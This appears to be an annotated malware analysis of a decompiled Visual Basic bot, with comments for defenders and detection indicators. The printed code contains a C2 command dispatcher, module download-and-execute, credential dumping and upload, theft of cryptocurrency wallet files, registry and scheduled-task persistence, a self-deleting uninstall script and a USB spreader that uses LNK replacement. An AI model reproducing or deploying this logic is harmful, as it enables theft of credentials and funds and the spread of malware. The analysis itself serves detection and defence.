loc_40917F: shell_execute("Explorer " & var_8C, &HFF)
loc_40918A: Else
' 5: run "iexplore <arg>" via the late-bound WScript.Shell .Run (var_B0 holds
'    the command string; the decompiler dropped the call arguments).
loc_409197: If (command_id = 5) Then
loc_4091A3: var_B0 = CVar("iexplore " & var_8C) 'String
loc_4091A7: var_D0 = 0
loc_4091AD: var_128 = True
loc_4091B6: Call MemVar_402104.Run
loc_4091C2: Else
' 6/7/8: Proc_0_29_4059BC(&HA, "<1|2|3>" & var_90 & arg) -- module &HA with a
'    sub-command prefix.
loc_4091CF: If (command_id = 6) Then
loc_4091F2: Proc_0_29_4059BC(&HA, CStr(1) & var_90 & var_8C, var_128)
loc_409203: Else
loc_409210: If (command_id = 7) Then
loc_409233: Proc_0_29_4059BC(&HA, CStr(2) & var_90 & var_8C, var_D0)
loc_409244: Else
loc_409251: If (command_id = 8) Then
loc_409274: Proc_0_29_4059BC(&HA, CStr(3) & var_90 & var_8C)
loc_409285: Else
' 9: Proc_0_29_4059BC(6, 0) (module 6, the "ss.c" upload path in that routine).
loc_409292: If (command_id = 9) Then
loc_4092AA: Proc_0_29_4059BC(6, 0)
loc_4092B5: Else
' 10: toggle the OFF_C marker file: delete it if present, otherwise create it
'     and delete the hosts file (HOSTS_PATH). The outer UnknownFunc(var_B0)
'     test was not resolved by the decompiler.
loc_4092C2: If (command_id = 10) Then
loc_4092CC: If UnknownFunc(var_B0) Then
loc_4092DB: If get_attribute1(OFF_C) Then
loc_4092EA: Kill OFF_C
loc_4092F2: Else
loc_409306: write_to_file(OFF_C, 0)
loc_40931A: Kill HOSTS_PATH
loc_40931F: End If
loc_409321: End If
loc_409326: Else
' 11: toggle the POS module: if POS_PATH exists, clear Me(168), kill POS_EXE
'     and remove OUTPUT_TXT and POS_PATH; otherwise set Me(168) = &HFF.
loc_409333: If (command_id = 11) Then
loc_409342: If get_attribute1(POS_PATH) Then
loc_409349: Me(168) = 0
loc_409355: kill_task(POS_EXE)
loc_409366: Kill OUTPUT_TXT
loc_409377: Kill POS_PATH
loc_40937F: Else
loc_409385: Me(168) = &HFF
loc_40938A: End If
loc_40938F: Else
' 12: install or remove the "dwn" component (see Proc_0_31_4046A4).
loc_40939C: If (command_id = 12) Then
loc_4093A1: Proc_0_31_4046A4(0)
loc_4093A9: Else
' 13: write MY_DIR\email.txt from "<domain>?u=0" (to_b64 = &HFF), then
'     Proc_0_29_4059BC(7, 0).
loc_4093B6: If (command_id = 13) Then
loc_4093FA: write_to_file(MY_DIR & "email.txt", process_data(MY_DOMAIN & "?u=" & "0", &HFF))
loc_409417: Proc_0_29_4059BC(7, 0)
loc_409422: Else
' 14/15: Proc_0_29_4059BC(8|9, arg).
loc_40942F: If (command_id = 14) Then
loc_40943F: Proc_0_29_4059BC(8, var_8C)
loc_409447: Else
loc_409454: If (command_id = 15) Then
loc_409464: Proc_0_29_4059BC(9, var_8C)
loc_40946C: Else
' 16/17: force reboot / shutdown (see shutdown_or_reboot).
loc_409479: If (command_id = 16) Then
loc_409487: shutdown_or_reboot("1")
loc_409492: Else
loc_40949F: If (command_id = 17) Then
loc_4094AD: shutdown_or_reboot("0")
loc_4094B8: Else
' 18: End -- terminate the bot process.
loc_4094C5: If (command_id = 18) Then
loc_4094CA: End
loc_4094CF: Else
' 19: remove the "L!NK" registry setting (VB DeleteSetting, section 19), then
'     modify_bot_install("1", 0, &HFF): wipe MY_DIR and exit -- uninstall.
loc_4094D4: var_A0 = 19
loc_4094DC: If (command_id = 19) Then
loc_4094EC: DeleteSetting("L!NK", var_A0, var_D0)
loc_40950B: modify_bot_install("1", 0, &HFF)
loc_409516: Else
' 20/21/22/25: Proc_0_29_4059BC(&HE, "<1|2|3|4>" & var_90 [& arg]).
loc_409523: If (command_id = 20) Then
loc_40953F: Proc_0_29_4059BC(&HE, CStr(1) & var_90)
loc_40954E: Else
loc_40955B: If (command_id = 21) Then
loc_40957E: Proc_0_29_4059BC(&HE, CStr(2) & var_90 & var_8C)
loc_40958F: Else
loc_40959C: If (command_id = 22) Then
loc_4095BF: Proc_0_29_4059BC(&HE, CStr(3) & var_90 & var_8C)
loc_4095D0: Else
' 23/24: Proc_0_29_4059BC(&HF, var_90) / (&HF, "1").
loc_4095DD: If (command_id = 23) Then
loc_4095ED: Proc_0_29_4059BC(&HF, var_90)
loc_4095F5: Else
loc_409602: If (command_id = 24) Then
loc_409617: Proc_0_29_4059BC(&HF, CStr(1))
loc_409622: Else
loc_40962F: If (command_id = 25) Then
loc_409652: Proc_0_29_4059BC(&HE, CStr(4) & var_90 & var_8C)
loc_409663: Else
' Unknown command id: nothing is done.
loc_409667: Exit Sub
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_40966C: Exit Sub
End Sub
' C2 beacon. Sends one POST with the MSXML2.ServerXMLHTTP instance created in
' init_globals (MSXML_OBJ) and feeds the response to parse_and_execute_commands.
' The Open/SetRequestHeader/Send arguments were dropped by the decompiler; the
' recovered strings show a "User-Agent" header, a "Content-Type" header and a
' body built around Me(12) (the fingerprint string set by fingerprint_system)
' and "application/x-www-form-urlencoded". The response is base64-decoded
' before parsing (L40562D).
' Note for defenders: the bot silently gives up on any non-"OK" status text or
' on a response body containing "<" (ChrW$(&H3C)), so an intercepting HTML page
' stops command dispatch without error.
Public Sub cnc_post_and_read
'Data Table: 401634
Dim var_98 As Variant
Dim var_C8 As Boolean
Dim var_EC As Variant
loc_405520: On Error Resume Next
loc_40552A: Set conn_obj = MSXML_OBJ
loc_405530: var_98 = "POST"
loc_40553F: var_C8 = False
loc_405547: Call conn_obj.Open
loc_40554F: var_98 = "User-Agent"
loc_405561: Call conn_obj.SetRequestHeader
loc_405569: var_98 = "Content-Type"
loc_405578: Call conn_obj.SetRequestHeader
' Request body; Proc_0_9_4040BC presumably encodes Me(12) -- confirm.
loc_40558E: var_EC = CVar(var_98 & Proc_0_9_4040BC(Me(12), "application/x-www-form-urlencoded", var_98, Me(128))) 'String
loc_405595: Call conn_obj.Send
' Bail out on a non-OK status or any "<" in the body (rejects HTML responses).
loc_4055F3: If CBool((conn_obj.StatusText <> "OK") Or (InStr(1, conn_obj.ResponseText, CVar(ChrW$(&H3C)), 0) <> 0)) Then
loc_4055F8: Exit Sub
loc_4055F9: End If
' Responses of 3 characters or fewer are ignored.
loc_405612: If (Len(conn_obj.ResponseText) > 3) Then
loc_40562D: parse_and_execute_commands(base64_decode(CStr(conn_obj.ResponseText), conn_obj.ResponseText, var_C8), MY_DOMAIN)
loc_40563C: End If
loc_405640: Set conn_obj = Nothing
loc_405646: Exit Sub
End Sub
' Downloads module number arg_C from "<MY_DOMAIN>?p=<arg_C>" and runs it via
' Proc_0_25_4082A0 (an in-memory/child execution helper not shown here).
'   arg_C  = module id; &HB is special-cased to run with wscript.exe.
'   arg_10 = argument string handed to the module (see the dispatcher).
' For module 6 it then polls up to five times, one second apart (Sleep &H3E8),
' for MY_DIR\ss.c, uploads it with post_content under a name derived from
' Proc_0_49_404F40(6, ...) and deletes it. The GoTo pairs loc_40592B /
' loc_4059B0 are the decompiler's rendering of that retry loop.
Public Sub Proc_0_29_4059BC(arg_C, arg_10) '4059BC
'Data Table: 401634
Dim var_98 As String
Dim var_8C As Long
loc_405854: On Error Resume Next
loc_405881: var_88 = process_data(MY_DOMAIN & "?p=" & CStr(arg_C), 0)
' Module &HB: executed through the system wscript.exe interpreter.
loc_405898: If (arg_C = &HB) Then
loc_4058AD: var_98 = MY_APPNAME & ".exe" & "|"
loc_4058CA: Proc_0_25_4082A0(var_88, SYSTEM32_DIR & "wscript.exe")
loc_4058DD: Else
loc_4058F8: If Proc_0_25_4082A0(var_88, "1", arg_10) Then
' Module 6: wait for its output file "ss.c" and exfiltrate it.
loc_405906: If (arg_C = 6) Then
loc_405910: var_8C = 0
loc_405925: ssc_file = MY_DIR & "ss" & ".c"
loc_40592B: ' Referenced from: 4059AD
' var_8C counts attempts (0..4).
loc_405936: If (var_8C <= 4) Then
loc_405943: If get_attribute1(ssc_file, var_8C) Then
loc_405973: If post_content(ssc_file, Proc_0_49_404F40(6, var_98 & Me(88))) Then
loc_405980: Kill ssc_file
loc_405985: End If
loc_405987: GoTo loc_4059B0
loc_40598D: Else
' &H3E8 = 1000 ms between polls.
loc_405996: Sleep(&H3E8)
loc_4059A6: var_8C = (var_8C + 1)
loc_4059A9: End If
loc_4059AD: GoTo loc_40592B
loc_4059B0: ' Referenced from: 405987
loc_4059B0: End If
loc_4059B0: End If
loc_4059B2: End If
loc_4059B4: End If
loc_4059B8: Exit Sub
End Sub
' Credential-collection pass. For module indices 0..5 it downloads
' "<MY_DOMAIN>?p=<index>", runs it via Proc_0_25_4082A0 with the argument
' "/stext "<APPDATA>\<index>.c"", polls up to five times (1 s apart) for that
' output file, uploads it with post_content under the name from
' Proc_0_49_404F40(index, ...), then deletes the file in a retry loop until it
' is gone. Finally runs steal_wallets and returns &HFF (Integer true).
' NOTE(review): "/stext <file>" matches the command-line switch several
' password-recovery utilities use to dump results to a text file -- the modules
' are presumably such tools; confirm from the downloaded payloads.
' Both GoTo pairs (loc_406010/loc_40607C and loc_40608F) are decompiled loops.
Public Sub Proc_0_30_4060D8
'Data Table: 401634
Dim var_9C As Long
Dim var_92 As Integer
Dim var_86 As Integer
loc_405F48: On Error Resume Next
loc_405F5A: For index = 0 To 5: _index = index 'Long
' Output file for this module: %APPDATA%\<index>.c
loc_405F77: filename = APPDATA_DIR & CStr(_index) & ".c"
loc_405F88: var_9C = 0
loc_405FB5: var_8C = process_data(MY_DOMAIN & "?p=" & CStr(_index), 0, &HFF)
' Module 2 gets a flag (var_92 = &HFF) that is later passed to get_attribute1.
loc_405FCC: If (_index = 2) Then
loc_405FD3: var_92 = &HFF
loc_405FD6: End If
loc_40600D: If Proc_0_25_4082A0(var_8C, "1", "/stext " & """" & filename & """") Then
loc_406010: ' Referenced from: 406079
' var_9C counts poll attempts (0..4).
loc_40601B: If (var_9C <= 4) Then
loc_406028: If get_attribute1(filename, var_92) Then
loc_406045: post_content(filename, Proc_0_49_404F40(_index, var_9C))
loc_406053: GoTo loc_40607C
loc_406059: Else
loc_406062: Sleep(&H3E8)
loc_406072: var_9C = (var_9C + 1)
loc_406075: End If
loc_406079: GoTo loc_406010
loc_40607C: ' Referenced from: 406053
loc_40607C: End If
loc_40607C: End If
loc_406085: var_8C = 0
loc_40608C: var_92 = 0
loc_40608F: ' Referenced from: 4060B4
' Keep deleting until the output file no longer exists.
loc_406099: If get_attribute1(filename, var_92, var_9C) Then
loc_4060A6: Kill filename
loc_4060AD: DoEvents()
loc_4060B4: GoTo loc_40608F
loc_4060B7: End If
loc_4060BC: Next index 'Long
loc_4060C8: If steal_wallets() Then
loc_4060CF: var_86 = &HFF
loc_4060D2: End If
' Decompiler rendering of the Integer return value.
loc_4060D4: Result var_86 End Sub 'Integer
End Sub
' Toggle for the "dwn" component (reached from dispatcher command 12).
' If LOGNAME (MY_DIR\log.c) exists the component is removed: dwn.exe is killed,
' DWN_EXE is un-hidden (SetAttr 0) and LOGNAME, KEYS_C, DWN_EXE and WIN_C are
' deleted. Otherwise module &HC (12) is downloaded into LOGNAME and
' Proc_0_32_4051F0 installs it. The recovered signature has no parameters even
' though the dispatcher passes one.
Public Sub Proc_0_31_4046A4
'Data Table: 401634
loc_4045FE: If get_attribute1(LOGNAME) Then
loc_40460A: kill_task("dwn.exe")
loc_404617: Sleep(&H3E8)
' Clear attributes first so Kill can remove the hidden/system file.
loc_404626: SetAttr DWN_EXE, 0
loc_404635: Kill LOGNAME
loc_404644: Kill KEYS_C
loc_404653: Kill DWN_EXE
loc_404662: Kill WIN_C
loc_40466A: Else
loc_40469A: If process_and_write_to_file(MY_DOMAIN & "?p=" & CStr(&HC), LOGNAME) Then
loc_40469D: Proc_0_32_4051F0(0)
loc_4046A2: End If
loc_4046A2: End If
loc_4046A2: Exit Sub
End Sub
' Installs the "dwn" component: decrypts the downloaded LOGNAME file, fetches a
' configuration string from "<MY_DOMAIN>?u=2" and stores it in WIN_C when it
' looks like a comma-separated list, copies the bot's own executable (Me(88))
' to DWN_EXE with hidden+system attributes (SetAttr 6 = vbHidden + vbSystem),
' and launches the decrypted module through Proc_0_25_4082A0 with DWN_EXE.
Public Sub Proc_0_32_4051F0
'Data Table: 401634
loc_4050E4: On Error Resume Next
loc_40510C: var_88 = decrypt(file_binary_open(LOGNAME))
loc_405128: var_94 = MY_DOMAIN & "?u=" & CStr(2)
loc_40513E: Kill KEYS_C
loc_40514F: UnknownFunc(var_94)
loc_405173: var_90 = process_data(var_94, &HFF, 0)
' Only accept a response longer than 4 chars that contains a comma.
loc_40519B: If ((Len(var_90) > 4) And (InStr(1, var_90, ",", 0) <> 0)) Then
loc_4051A8: write_to_file(WIN_C, var_90, StrConv(var_94, vbUnicode))
loc_4051AD: End If
loc_4051B9: FileCopy Me(88), DWN_EXE
loc_4051CA: SetAttr DWN_EXE, 6
loc_4051E4: Proc_0_25_4082A0(var_88, DWN_EXE, 0)
loc_4051EE: Exit Sub
End Sub
' Cryptocurrency wallet theft. Builds a list of 28 wallet-folder name fragments,
' derives a folder name under %APPDATA% for each (index 4 is combined with
' index 2, i.e. "Electrum" & "-LTC"; indices above 8 get a "coin" suffix), and
' for every folder that exists (Proc_0_14_403F14, presumably a directory-exists
' check) enumerates "*.wallet" files with Dir and uploads each one through
' post_content, naming the upload after VOL_SERIAL and the file name.
' Always returns &HFF. The GoTo loc_407A1C / Dir pair is a decompiled
' enumeration loop. VarIndexSt after var_2A0 / var_290 presumably stores the
' adjusted name back into mArr(_index) -- confirm.
' Detection: access to %APPDATA%\<wallet name>\*.wallet by this process.
Public Sub steal_wallets
'Data Table: 401634
Dim var_2A0 As Variant
Dim var_290 As Variant
Dim var_278 As Variant
loc_407740: On Error Resume Next
loc_407752: ReDim _arr(0 To &H1B)
loc_407769: _arr(0) = "MultiBit"
loc_407778: _arr(1) = "Armory"
loc_407787: _arr(2) = "Electrum"
loc_407796: _arr(3) = "digital"
loc_4077A5: _arr(4) = "-LTC"
loc_4077B4: _arr(5) = "MultiDoge"
loc_4077C3: _arr(6) = "BitcoinDark"
loc_4077D2: _arr(7) = "Unobtanium"
loc_4077E1: _arr(8) = "Dash"
loc_4077F0: _arr(9) = "Bit"
loc_4077FF: _arr(&HA) = "Lite"
loc_40780E: _arr(&HB) = "Name"
loc_40781D: _arr(&HC) = "PP"
loc_40782C: _arr(&HD) = "Feather"
loc_40783B: _arr(&HE) = "Nova"
loc_40784A: _arr(&HF) = "Prime"
loc_407859: _arr(&H10) = "Terra"
loc_407868: _arr(&H11) = "Dev"
loc_407877: _arr(&H12) = "Anon"
loc_407886: _arr(&H13) = "Pay"
loc_407895: _arr(&H14) = "World"
loc_4078A4: _arr(&H15) = "Quark"
loc_4078B3: _arr(&H16) = "Infinite"
loc_4078C2: _arr(&H17) = "Doge"
loc_4078D1: _arr(&H18) = "Asic"
loc_4078E0: _arr(&H19) = "Lotto"
loc_4078EF: _arr(&H1A) = "Dark"
loc_4078FE: _arr(&H1B) = "Mona"
loc_407912: mArr = Array(_arr) 'Variant
loc_407923: CRefVarAry
loc_40792A: For index = 0 To UBound(mArr, 1): _index = index 'Long
' Index 4: "Electrum" & "-LTC".
loc_40793B: If (_index = 4) Then
loc_407966: var_2A0 = mArr(2) & mArr(_index)
loc_40796E: VarIndexSt
loc_40797B: End If
' Indices 9..27: append "coin" (e.g. "Bit" -> "Bitcoin").
loc_407986: If (_index > 8) Then
loc_4079A7: var_290 = mArr(_index) & "coin"
loc_4079AF: VarIndexSt
loc_4079BA: End If
' Candidate wallet directory: %APPDATA%\<name>\
loc_4079D4: var_290 = CVar(APPDATA_DIR) & mArr(_index)
loc_4079E2: var_8C = CStr(var_290 & "\")
loc_4079FD: If Proc_0_14_403F14(var_8C, 0, mArr, var_290, _index) Then
loc_407A0E: var_278 = CVar(var_8C & "*.wallet") 'String
loc_407A16: var_90 = Dir(var_278, 0)
loc_407A1C: ' Referenced from: 407AAB
' Loop over every *.wallet match and upload it.
loc_407A24: If CBool(Len(var_90)) Then
loc_407A7B: post_content(var_8C & var_90, CStr(var_278 & "_" & CVar(VOL_SERIAL) & "-" & CVar(var_90)), 0, mArr(_index))
loc_407AA3: var_90 = Dir(var_278, 0)
loc_407AAB: GoTo loc_407A1C
loc_407AAE: End If
loc_407AAE: End If
loc_407AB5: Next index 'Long
loc_407AC3: Result &HFF End Sub 'Integer
End Sub
' HTTP fetch + optional decode. Callers pass a URL (e.g. MY_DOMAIN & "?p=<n>")
' as arg_C. The body is read in &H1000-byte chunks (res_str) through calls the
' decompiler could not resolve (UnknownFunc) and accumulated in var_8C until a
' zero-length read (var_9C = 0) or a failed read (Not var_92); the GoTo
' loc_405741 / loc_4057AA pair is that read loop.
'   to_b64     : if set, the accumulated data is base64-decoded.
'   to_encrypt : despite its name, if set the data is run through decrypt()
'                with a key derived by Proc_0_19_404CD8 -- i.e. it selects
'                decryption of an encrypted download.
' Result (var_88) is the raw, base64-decoded or decrypted body.
Public Sub process_data(arg_C, to_b64, to_encrypt) '40580C
'Data Table: 401634
Dim var_A8 As Long
Dim var_98 As Long
Dim var_BA As Integer
Dim var_92 As Integer
Dim var_A4 As String
loc_4056A4: On Error Resume Next
loc_405700: var_A4 = arg_C
' Presumably opens the connection; Me(128) is also used as a header value in
' cnc_post_and_read -- confirm.
loc_40570C: var_A8 = UnknownFunc(UnknownFunc(Me(128)))
loc_40571A: var_98 = var_A8
' 4096-byte read buffer pre-filled with "0".
loc_405739: res_str = String$(&H1000, CVar(Chr$(&H30)))
loc_405741: ' Referenced from: 4057A7
loc_405750: var_A4 = res_str
loc_40575C: var_BA = UnknownFunc(var_98)
loc_40576D: var_92 = CBool(var_BA)
' Stop on zero bytes read or read failure.
loc_405783: If ((var_9C = 0) Or Not(var_92)) Then
loc_405788: GoTo loc_4057AA
loc_40578B: End If
loc_40579B: var_A4 = Left$(res_str, var_9C)
loc_40579F: var_8C = var_8C & var_A4
loc_4057A7: GoTo loc_405741
loc_4057AA: ' Referenced from: 405788
loc_4057B6: If (Len(var_8C) <> 0) Then
loc_4057BE: If to_encrypt Then
loc_4057D7: var_88 = decrypt(var_8C, Proc_0_19_404CD8(var_8C, var_92, StrConv(res_str, vbUnicode), var_A4, var_BA, var_A4, Len(res_str)), var_9C, var_98, StrConv(arg_C, vbUnicode))
loc_4057E0: Else
loc_4057E7: If to_b64 Then
loc_4057F4: var_88 = base64_decode(var_8C, var_A4, var_A8)
loc_4057FA: Else
loc_4057FF: var_88 = var_8C
loc_405802: End If
loc_405802: End If
loc_405804: End If
loc_405808: Exit Sub
End Sub
' Reads a whole file into a string. Uses the fixed file number 1 in Binary
' mode, sizes the buffer with LOF and returns the contents in var_88.
' The 0 in "Get 1, 0, var_8C" is probably the decompiler's rendering of an
' omitted position argument (VB positions are 1-based) -- confirm.
Public Sub file_binary_open(filename) '403E94
'Data Table: 401634
loc_403E54: On Error Resume Next
loc_403E60: Open filename For Binary As 1 Len = &HFF
loc_403E72: var_8C = Space$(LOF(1))
loc_403E81: Get 1, 0, var_8C
loc_403E87: Close 1
loc_403E8E: var_88 = var_8C
loc_403E93: Exit Sub
End Sub
' Writes content to filename, always on fixed file number 1.
' Content shorter than &H400 (1024) characters is written with Print in text
' mode (which appends a line terminator); longer content is written with Put in
' Binary mode. Several callers pass a third argument the recovered signature
' does not have -- decompiler artifact, or an optional parameter not recovered.
Public Sub write_to_file(filename, content) '404158
'Data Table: 401634
loc_4040F8: On Error Resume Next
loc_404107: If (Len(content) < &H400) Then
loc_404113: Open filename For Output As 1 Len = &HFF
loc_40411E: Print 1, content
loc_404128: Close 1
loc_40412D: Else
loc_404138: Open filename For Binary As 1 Len = &HFF
loc_404148: Put 1, 0, content
loc_40414E: Close 1
loc_404150: End If
loc_404154: Exit Sub
End Sub
' Runs a command line with VB Shell() using window style 0 (vbHide); the
' returned task id is discarded. Some callers pass a second argument the
' recovered signature lacks (likely a wait flag or decompiler artifact).
Public Sub shell_execute(arg_C) '403C08
'Data Table: 401634
Dim var_9C As Double
loc_403BE8: On Error Resume Next
loc_403BFF: var_9C = Shell(arg_C, 0)
loc_403C04: Exit Sub
End Sub
' Forces a reboot (arg_C = "1" -> "-r") or shutdown (anything else -> "-s") by
' launching "shutdown -t 0 -<r|s> -f" hidden via shell_execute.
' Detection: shutdown.exe spawned with "-f -t 0" from this process.
Public Sub shutdown_or_reboot(arg_C) '403E14
'Data Table: 401634
loc_403DE0: If (arg_C = "1") Then
loc_403DE6: var_88 = "r"
loc_403DEC: Else
loc_403DEF: var_88 = "s"
loc_403DF2: End If
loc_403E04: shell_execute("shutdown -t 0 -" & var_88 & " -f")
loc_403E10: Exit Sub
End Sub
' Downloads `content` (callers pass a URL) through process_data and, if the
' result is non-empty, writes a file and returns &HFF; otherwise returns 0.
' As decompiled the file receives the original `content` argument rather than
' the fetched `arg_C`; that is most likely a lost assignment in the decompiler
' output (the callers expect the downloaded module on disk) -- confirm against
' the binary before relying on it.
Public Sub process_and_write_to_file(content, filename) '403DA8
'Data Table: 401634
Dim var_86 As Integer
loc_403D68: On Error Resume Next
loc_403D7D: arg_C = process_data(content, 0)
loc_403D8D: If (Len(arg_C) > 0) Then
loc_403D98: write_to_file(filename, content)
loc_403DA1: var_86 = &HFF
loc_403DA4: End If
loc_403DA6: Result var_86 End Sub 'Integer
End Sub
' Locates a named PE section inside the bot's own in-memory image
' (App.hInstance) and copies its raw contents out -- the likely mechanism for
' reading an embedded configuration or payload stored as a section.
'   arg_C = section name to look for (truncated to 8 characters, the PE
'           section-name length). Note the decompiled line truncates var_8C,
'           not arg_C; var_8C is never assigned from arg_C here -- artifact.
' Steps: copy &H40 bytes (DOS header) and check 23117 (&H5A4D, "MZ"); copy
' &H18 bytes at the PE offset and check &H4550 ("PE"); then step over section
' headers in &H28 (40-byte IMAGE_SECTION_HEADER) increments comparing the name
' prefix, and copy var_104 bytes from offset var_100 when it matches.
' The loop bound var_DE and the offsets var_90/var_D0/var_100/var_104 are
' fields of the copied headers (presumably NumberOfSections, e_lfanew,
' PointerToRawData, SizeOfRawData) -- names not recovered, confirm.
Public Sub Proc_0_40_40628C(arg_C, arg_10) '40628C
'Data Table: 401634
Dim MemVar_40B3A4 As Global
Dim var_118 As Long
Dim var_11C As Long
Dim var_15C As String
loc_406130: If (Len(arg_C) > 8) Then
loc_406140: var_8C = Left$(var_8C, 8)
loc_406143: End If
loc_40614F: var_124 = MemVar_40B3A4.App
' Base address of the running module.
loc_40615F: var_118 = App.hInstance
loc_40616A: If CBool(var_118) Then
loc_406178: CopyMemory(var_CC, var_118, &H40)
' 23117 = &H5A4D ("MZ").
loc_406185: If (var_CC = 23117) Then
loc_406197: CopyMemory(var_E4, (var_118 + var_90), &H18)
' &H4550 = "PE".
loc_4061A6: If (var_E4 = &H4550) Then
loc_4061CD: For var_130 = 0 To CLng((var_DE - 1)): var_120 = var_130 'Long
loc_4061E7: CopyMemory(Record Of arg_109, var_114, (((var_118 + var_90) + &H18) + CLng(var_D0)))
loc_406200: var_15C = arg_109
loc_406211: var_114 = var_15C
' Compare the section name prefix with the requested name.
loc_406223: If (Left$(var_15C, Len(var_8C)) = var_8C) Then
loc_406260: CopyMemory(CStr(String(var_104, CVar(Chr$(0)))), (var_118 + var_100), var_104)
loc_406271: Exit For
loc_406274: End If
' Next section header (&H28 = 40 bytes each). The loop reads via var_D0 but
' advances var_11C -- another recovery mismatch to confirm.
loc_40627D: var_11C = (var_11C + &H28)
loc_406283: Next var_130 'Long
loc_406288: ' Referenced from: 406271
loc_406288: End If
loc_406288: End If
loc_406288: End If
loc_406288: Exit Sub
End Sub
' Install / uninstall / self-replace routine. Ends the process (End) after
' scheduling a self-deleting .cmd script in %TEMP%.
'   arg_C    : path to start after cleanup when longer than 1 character
'              (the dispatcher passes a downloaded module, or "1" for none).
'   copy_bot : copy the running executable (Me(88)) to MY_APPNAME and launch
'              it; exits early unless Me(162) is set.
'   arg_14   : if set, the script removes the whole MY_DIR ("rd /q /s");
'              otherwise it deletes only the running executable.
'   kill_bot : if set, stop dwn.exe / wscript.exe / POS_EXE, delete dropped
'              files, undo the task-manager/regedit restrictions, delete the
'              HKCU Run / RunOnce / Policies\Explorer\Run autostart values and
'              end the scheduled task "<MY_APPNAME>.exe".
' Persistence locations named here (useful IoCs):
'   HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\<MY_APPNAME>
'   HKCU\Software\Microsoft\Windows\CurrentVersion\run\<MY_APPNAME>
'   HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\<MY_APPNAME>
'   scheduled task "<MY_APPNAME>.exe", Startup-folder copy (Me(40)).
' The .cmd uses "ping -n 4 127.0.0.1 > nul" as a delay before deleting, then
' deletes itself ("del /F <script>").
Public Sub modify_bot_install(arg_C, copy_bot, arg_14, kill_bot) '4076EC
'Data Table: 401634
Dim var_A0 As Variant
Dim var_B4 As String
Dim var_D0 As Integer
Dim var_F0 As Boolean
loc_407404: On Error Resume Next
loc_40740C: If copy_bot Then
loc_40741B: FileCopy Me(88), MY_APPNAME
loc_407427: shell_execute(MY_APPNAME)
loc_407434: If Not(Me(162)) Then
loc_407439: Exit Sub
loc_40743A: End If
loc_40743A: End If
loc_407441: If kill_bot Then
loc_40744F: kill_task("dwn.exe")
loc_407462: kill_task("wscript.exe")
loc_407471: kill_task(POS_EXE)
' Me(40) is the Startup folder path set in init_globals.
loc_40748D: Kill CVar(Me(40) & MY_APPNAME & ".exe")
loc_4074A4: Kill HOSTS_PATH
loc_4074B5: Kill OUTPUT_TXT
loc_4074C6: Kill POS_PATH
loc_4074D0: var_B4 = "0"
' "0" presumably re-enables Task Manager / registry tools -- confirm.
loc_4074DF: disable_tskmgr_regtools("0")
loc_4074FF: disable_tskmgr_regtools("1", "0")
' WScript.Shell RegDelete on the three autostart values (arguments dropped
' by the decompiler; var_A0 holds the key path).
loc_407512: Set _wscript = WSCRIPT_OBJ
loc_407521: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\" & MY_APPNAME) 'String
loc_407528: Call _wscript.RegDelete
loc_40753C: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\run\" & MY_APPNAME) 'String
loc_407543: Call _wscript.RegDelete
loc_407557: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\" & MY_APPNAME) 'String
loc_40755E: Call _wscript.RegDelete
' End the scheduled task named after the bot executable.
loc_40758E: var_A0 = CVar("schtasks /" & "end /tn " & """" & MY_APPNAME & ".exe" & """") 'String
loc_407592: var_D0 = 0
loc_407598: var_F0 = False
loc_4075A0: Call _wscript.Run
loc_4075B8: Set _wscript = Nothing
loc_4075BC: End If
' Self-deleting batch file in %TEMP% with a random name.
loc_4075D5: filename = var_A0 & make_random_string(TEMP_DIR, var_F0, var_D0, var_A0) & ".cmd"
loc_4075EF: If ((Len(arg_C) > 1) Or arg_14) Then
loc_4075FB: command = "ping -n 4 127.0.0.1 > nul" & vbCrLf
loc_4075FE: End If
loc_407603: If arg_14 Then
loc_40762D: command = command & "rd /q /s " & """" & "\\.\" & MY_DIR & """"
loc_40763E: Else
loc_40765E: command = command & "del /F " & """" & Me(88) & """"
loc_40766A: End If
loc_407676: If (Len(arg_C) > 1) Then
loc_407690: command = command & vbCrLf & "start " & arg_C
loc_40769A: End If
loc_4076D5: write_to_file(filename, command & vbCrLf & "del /F " & """" & filename & """", var_A0)
loc_4076DF: shell_execute(filename, var_A0)
' Terminate so the script can delete the running binary.
loc_4076E6: End
loc_4076EA: Exit Sub
End Sub
' Removable-drive spreader (LNK-replacement technique). For every ready drive
' with free space and drivetype = 1 (FSO removable drive):
'   - copies the bot executable (Me(88)) to <drive>\MSOCache.pif and marks it
'     hidden+system (SetAttr 6);
'   - for each root file that is not already a .lnk: sets hidden+system and
'     creates "<name>.lnk" (same base name) whose target is cmd.exe run
'     minimized (windowstyle 7) with
'     "/c start MSOCache.pif&start <original file>&exit", taking the icon from
'     HKLM\software\classes\.<ext>\<progid>\defaulticon\ or the file itself;
'   - for each root subfolder: same, with "start explorer <folder>".
' The drive/file/folder objects and registry reads go through the late-bound
' MemVar_402104 (FSO / WScript.Shell); the decompiler dropped their arguments.
' Detection: MSOCache.pif in a drive root; .lnk files on removable media that
' launch cmd.exe with "start MSOCache.pif".
Public Sub Proc_0_42_408E68
'Data Table: 401634
Dim var_C0 As Variant
Dim var_B0 As Variant
Dim var_F8 As Variant
Dim var_118 As Variant
Dim var_108 As Variant
Dim arg_2008 As Variant
Dim var_1A8 As String
Dim var_128 As Variant
Dim var_1B8 As String
loc_408800: On Error Resume Next
loc_40880F: CAdVar
loc_40881B: For Each var_98 In MemVar_402104.drives
' drivetype = 1 -> removable.
loc_408862: If CBool(var_98.isready And (var_98.freespace > 0) And (var_98.drivetype = 1)) Then
loc_40888A: FileCopy Me(88), CStr(var_98.Path & "\" & "MSOCache.pif")
loc_4088CD: If get_attribute1(CStr(var_98.Path & "\" & "MSOCache.pif")) Then
loc_4088FA: SetAttr CStr(var_98.Path & "\" & "MSOCache.pif"), 6
loc_40890B: End If
loc_40891A: var_C0 = var_98.Path & "\"
